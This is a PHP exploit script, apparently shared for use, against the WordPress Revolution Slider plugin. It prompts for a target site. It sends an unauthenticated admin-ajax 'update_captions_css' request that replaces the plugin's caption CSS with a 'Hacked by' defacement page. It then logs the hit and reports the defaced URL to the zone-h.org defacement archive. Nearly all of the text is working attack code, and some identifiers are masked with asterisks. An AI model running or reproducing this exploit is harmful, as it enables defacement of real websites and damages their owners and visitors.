Wp Plugin Revolution Slider - Unrestricted File Upload Exp

1. <?php
2. /*
3.  
4.  
5. Kyfx -
6.  
7.  
8. */
9. $agent = "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)";
10. $******_file_path = "/";
11. $site = rtrim($site,'/');
12. echo "\n| Enter Target # ";
13. $site=trim(fgets(STDIN));
14. echo "\n| Enter Your **** # ";
15. $****=trim(fgets(STDIN));
16. $url= "http://zone-h.org/notify/single";
17. $hackmode="1";
18. $reson="1";
19. $path ="/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
20. echo "\n| Enter Your **** account zone-h # ";
21. $hacker=trim(fgets(STDIN));
22.  
23. $ch = curl_init();
24. curl_setopt($ch, CURLOPT_URL, "http://".$site."/wp-admin/admin-ajax.php");
25. curl_setopt($ch, CURLOPT_USERAGENT, $agent);
26. curl_setopt($ch, CURLOPT_POST, 1);
27. curl_setopt($ch, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => "<**** style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by $****<p style='color: transparent'>"));
28. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
29. curl_setopt($ch, CURLOPT_FOLLOW********, 1);
30. curl_setopt($ch, CURLOPT_******FILE, $******_file_path);
31. curl_setopt($ch, CURLOPT_******JAR, $******_file_path);
32. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
33. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
34. $result = curl_exec($ch);
35. if (eregi('true', $result)) {
36. echo "| wait ......\n";
37. echo "| Success Exploit\n";
38. echo "| Link Index: http://".$site . "/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
39. $fo = fopen("finish.txt","a+");
40. $r = fwrite($fo,"http://".$site."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css\r\n");
41. fclose($fo);}
42. else {
43. echo "| http://".$site . " : Not Revslider \n\n";
44. }
45. echo "\n\n";
46. $k = curl_init();
47. curl_setopt($k, CURLOPT_URL, $url);
48. curl_setopt($k,CURLOPT_POST,1);
49. curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1="."http://".$site."".$path."&hackmode=".$hackmode."&reason=".$reson);
50. curl_setopt($k,CURLOPT_FOLLOW********, true);
51. curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
52. $kubra = curl_exec($k);
53. curl_close($k);
54. if (eregi('OK', $kubra)) {
55. echo "| Send Site To Zone-H\n";
56. echo "| Site : ".$site." Defaced !";
57. } else {
58. echo "| Send Site To Zone-H\n";
59. echo "| http://".$site . " : Not Defaced \n\n";
60. }
61. curl_close($ch);
62.  
63.  
64.  
65. ?>